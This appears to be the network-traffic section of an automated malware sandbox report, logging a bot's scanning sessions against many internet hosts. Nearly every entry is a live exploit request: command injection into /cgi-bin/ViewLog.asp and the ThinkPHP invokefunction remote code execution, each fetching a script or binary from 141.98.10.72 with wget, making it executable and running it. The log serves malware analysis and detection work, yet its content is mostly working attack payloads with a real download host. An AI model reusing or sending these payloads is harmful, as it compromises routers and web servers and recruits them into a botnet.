                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.259406090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:13.409379959 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        726192.168.2.144980662.29.116.2558080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.243206978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        727192.168.2.145899262.148.152.68080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.243283987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        728192.168.2.144973295.86.99.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.251089096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        729192.168.2.145820488.208.9.24480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.685322046 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:37.804820061 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.20.2
                                                        Date: Wed, 14 Feb 2024 08:34:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        730192.168.2.144054085.95.36.148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.719909906 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        731192.168.2.143439688.86.120.11180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.783845901 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:38.001966953 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        732192.168.2.144233288.71.162.24580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.788858891 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        733192.168.2.143773688.99.210.3780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.803513050 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:38.038645029 CET292INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        734192.168.2.145478488.255.245.10680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:37.812289000 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        735192.168.2.144088695.68.16.9080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:38.015105963 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:38.573838949 CET64INHTTP/1.1 400 Bad Request
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        736192.168.2.145395695.169.211.18080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:38.038902044 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        737192.168.2.143349895.64.184.7880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:38.043020964 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:38.282921076 CET333INHTTP/1.1 400 Bad Request
                                                        Server: Web server
                                                        Date: Wed, 14 Feb 2024 08:34:36 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 171
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        738192.168.2.145374894.242.231.2118080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:38.564585924 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        739192.168.2.145022231.130.42.578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:38.680938005 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:38.915175915 CET421INHTTP/1.1 200 OK
                                                        Content-Security-Policy: default-src *; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; frame-ancestors 'self'
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        Date: Wed, 14 Feb 2024 08:34:38 GMT
                                                        Etag: "5d9dcbf7.1676"
                                                        Content-Type: text/html
                                                        Content-Length: 1676
                                                        Connection: close
                                                        Accept-Ranges: bytes


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        740192.168.2.144052631.207.83.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:38.689718008 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:38.932543993 CET543INHTTP/1.1 301 Moved Permanently
                                                        Date: Wed, 14 Feb 2024 08:34:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: keep-alive
                                                        Location: https://192.168.0.14:4443
                                                        Server: Custom Header
                                                        X-Frame-Options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        741192.168.2.144369462.29.42.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:38.694624901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        742192.168.2.145324294.122.68.2288080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:38.694706917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        743192.168.2.145023031.130.42.578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:39.143035889 CET117INHTTP/1.1 500 Server Error
                                                        Content-Length: 48
                                                        Date: Wed, 14 Feb 2024 08:34:39 GMT
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        744192.168.2.143835888.209.238.22780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:39.560911894 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:39.837351084 CET399INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:37 GMT
                                                        Server:
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        745192.168.2.145329895.130.170.13580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:39.807077885 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:40.053594112 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:20 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        746192.168.2.143999831.136.89.288080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:41.180959940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:41.829209089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:43.109328032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.860945940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
